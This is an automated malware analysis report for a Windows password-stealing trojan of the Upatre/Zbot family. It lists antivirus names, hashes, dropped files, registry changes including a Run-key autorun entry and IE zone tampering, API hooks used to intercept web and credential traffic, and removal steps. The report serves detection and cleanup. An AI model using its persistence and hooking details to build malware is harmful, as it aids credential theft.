Trojan.GenericKD.1588089 (BitDefender), TrojanDownloader:Win32/Upatre.O (Microsoft), Trojan.Win32.Bublik.caqm (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoad3.28161 (DrWeb), Trojan.GenericKD.1588089 (B) (Emsisoft), Artemis!6547C20E2CE1 (McAfee), Downloader (Symantec), Trojan.GenericKD.1588089 (FSecure), Generic10_c.AQZC (AVG), Win32:Malware-gen (Avast), Trojan.GenericKD.1588089 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6547c20e2ce10eed3739af76becbae17
SHA1: d7f45d7f003ce9ca20a8f31004730be73f31a22c
SHA256: 771e93819c7edc041e078d81e24e17646fdf75c601ef9b5eaec0770668ee7619
SSDeep: 96:BPosVfXYEI3k8 rd2HGkRiDtrQ57fShKn9vwAl17q8d7ZH1YI2op:a4fXYEI3X rd0fiJY809YkvdVVRtp
Size: 6746 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Setup
Created at: 2012-04-15 18:24:28
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
driverquery.exe:2460
attrib.exe:1416
tasklist.exe:2360
dutit.exe:1116
systeminfo.exe:1756
makecab.exe:2920
butit.exe:1304
opera_autoupdater.exe:304
reg.exe:2656
The Trojan-PSW injects its code into the following process(es):
osuf.exe:604
Explorer.EXE:1212
File activity
The process driverquery.exe:2460 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (9348 bytes)
The process tasklist.exe:2360 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (3407 bytes)
The process dutit.exe:1116 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\OLT8457.bat (176 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak\osuf.exe (1138688 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak (4096 bytes)
The process osuf.exe:604 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\NTUSER.DAT (212992 bytes)
%System%\drivers\1a6c48.sys (63488 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (83456 bytes)
%Documents and Settings%\%current user% (28672 bytes)
The process systeminfo.exe:1756 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (2280 bytes)
The process makecab.exe:2920 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~49.tmp (15946 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab7 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab10 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab11 (0 bytes)
The process butit.exe:1304 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%WinDir%\zlib1.dll (59904 bytes)
%WinDir%\aplib64.dll (12800 bytes)
%WinDir%\client.dll (227840 bytes)
%WinDir%\aplib.dll (11264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1715578.cmd (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FK4PQQEZ\desktop.ini (67 bytes)
The Trojan-PSW deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FK4PQQEZ\data[1].0&type=8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~49.tmp (0 bytes)
The process opera_autoupdater.exe:304 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\27UKp[1].fb2 (731883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dutit.exe (831488 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\butit.exe (591872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\Test[1].fb2 (256674 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\desktop.ini (67 bytes)
The process reg.exe:2656 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (26430 bytes)
Registry activity
The process driverquery.exe:2460 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC 11 6D 63 58 83 38 55 71 69 8C C9 02 FE 07 44"
The process attrib.exe:1416 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A C7 49 BF 19 C6 9B 21 83 4E 77 E3 8D 11 34 8C"
The process tasklist.exe:2360 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 75 80 3F 82 39 D1 37 D7 E3 06 15 AC 4C 8E 3D"
The process dutit.exe:1116 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 B6 36 6C 56 29 7B 38 2F 5E 90 47 33 BE 7A 9D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process osuf.exe:604 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Yhizteeqw]
"1c4289d" = "nZFcca11kkpFfg==("
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB C0 AB 0B D6 2D EA A1 4D 09 72 D5 C9 FB C1 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process systeminfo.exe:1756 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 A2 D9 84 57 96 DB 9A 69 17 DE 07 1E E2 12 D5"
The process makecab.exe:2920 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 23 8D 1B 30 2F CE 84 89 27 3D 53 69 0F 0F 4C"
The process butit.exe:1304 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 30 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B D0 F8 10 88 5F 44 74 12 AC B4 F3 32 57 15 9C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan-PSW adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"relokmgr" = "rundll32 %WinDir%\client.dll,CreateProcessNotify"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process opera_autoupdater.exe:304 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65324"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\ÃÂâ€Âþúуüõýты"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\ÃÂœþø ôþúуüõýты"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d45-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{91167d42-103d-11db-8c91-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\àðñþчøù ÑÂÂтþû"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\àðñþчøù ÑÂÂтþû"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp]
"dutit.exe" = "dutit"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 2F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\test\LOCALS~1\Temp]
"butit.exe" = "butit"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 1F 8B FB 1D 81 9D 9F 9B EF 2C D5 87 CE 66 75"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65324"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d8c0d8da-77bd-11e0-bb02-000c293bc0fd}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcf8d94-66db-11de-b228-806d6172696f}]
"BaseClass" = "Drive"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process reg.exe:2656 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 DF A6 E0 85 26 62 45 F4 4C 28 42 98 E2 23 D4"
Dropped PE files
| MD5 | File path |
|---|---|
| 7db604c446cb21b06b7673a9206914be | c:\Documents and Settings\test\Local Settings\Temp\opera_autoupdater.exe |
| 7fe2b0b3fc2078130f20070a05daf8d5 | c:\WINDOWS\aplib.dll |
| 3f4fe60b6d1e05144f6efa098ac381a8 | c:\WINDOWS\aplib64.dll |
| 01c1e3ab46762ef23eb2ac898ea84c2c | c:\WINDOWS\client.dll |
| 80e41408f6d641dc1c0f5353a0cc8125 | c:\WINDOWS\zlib1.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "UNKNOWN" the Trojan-PSW controls loading executable images into a memory by installing the Load image notifier.
Using the driver "UNKNOWN" the Trojan-PSW controls operations with a system registry by installing the registry notifier.
The Trojan-PSW installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetWriteFileExA
InternetQueryDataAvailable
HttpQueryInfoW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
The Trojan-PSW installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan-PSW installs the following user-mode hooks in USER32.dll:
GetClipboardData
TranslateMessage
The Trojan-PSW installs the following user-mode hooks in Secur32.dll:
DecryptMessage
SealMessage
DeleteSecurityContext
The Trojan-PSW installs the following user-mode hooks in WS2_32.dll:
WSAGetOverlappedResult
WSASend
recv
gethostbyname
WSARecv
send
closesocket
freeaddrinfo
getaddrinfo
GetAddrInfoW
The Trojan-PSW installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtCreateThread
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
driverquery.exe:2460
attrib.exe:1416
tasklist.exe:2360
dutit.exe:1116
systeminfo.exe:1756
makecab.exe:2920
butit.exe:1304
opera_autoupdater.exe:304
reg.exe:2656 - Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%Documents and Settings%\%current user%\Local Settings\Temp\_48.tmp (9348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OLT8457.bat (176 bytes)
%Documents and Settings%\%current user%\Application Data\Utfuak\osuf.exe (1138688 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (212992 bytes)
%System%\drivers\1a6c48.sys (63488 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (83456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab2 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab3 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab6 (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab4 (14951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cab5 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~49.tmp (15946 bytes)
%WinDir%\zlib1.dll (59904 bytes)
%WinDir%\aplib64.dll (12800 bytes)
%WinDir%\client.dll (227840 bytes)
%WinDir%\aplib.dll (11264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1715578.cmd (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FK4PQQEZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\27UKp[1].fb2 (731883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dutit.exe (831488 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\butit.exe (591872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RTEJ67TP\Test[1].fb2 (256674 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SG2624E3\desktop.ini (67 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"relokmgr" = "rundll32 %WinDir%\client.dll,CreateProcessNotify" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 1259 | 1536 | 3.48941 | ea4a11f8ff9ed99ebc87aff02102a621 |
| .data | 8192 | 3146 | 3584 | 4.65409 | 6603bf6b43b300ad9e541effbd07fd89 |
| .rsrc | 12288 | 16 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
cc998eb5c7a0a416fd3cc61ce28ce6a8
Network Activity
URLs
| URL | IP |
|---|---|
